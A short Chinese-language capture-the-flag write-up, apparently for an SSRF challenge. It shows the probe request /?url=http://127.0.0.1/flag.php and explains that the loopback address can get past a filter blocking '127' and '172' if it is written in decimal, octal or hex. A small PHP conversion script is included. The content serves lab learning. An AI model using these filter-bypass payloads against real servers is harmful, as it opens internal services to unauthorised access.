题目描述:这次ban掉了127以及172,不能使用点分十进制的IP了,但是又要访问127.0.0.1,该怎么办呢?
先构造:
/?url=http://127.0.0.1/flag.php
得到
发现127以及172被ban了,所以根据题目描述尝试绕过127.0.0.1。
绕过127.0.0.1的方法有很多
一,利用进制的转换
可以使用一些不同的进制替代ip地址,从而绕过WAF
搜索找到了一个一键转换的php脚本
<?php $ip = '127.0.0.1'; $ip = explode('.',$ip); $r = ($ip[0] << 24) | ($ip[1] << 16) | ($ip[2] << 8) | $ip[3] ; if($r < 0) { $r += 4294967296; } echo "十进制:"; echo $r; echo "八进制:"; echo decoct($r); echo "十六进制:"; echo dechex($r); ?></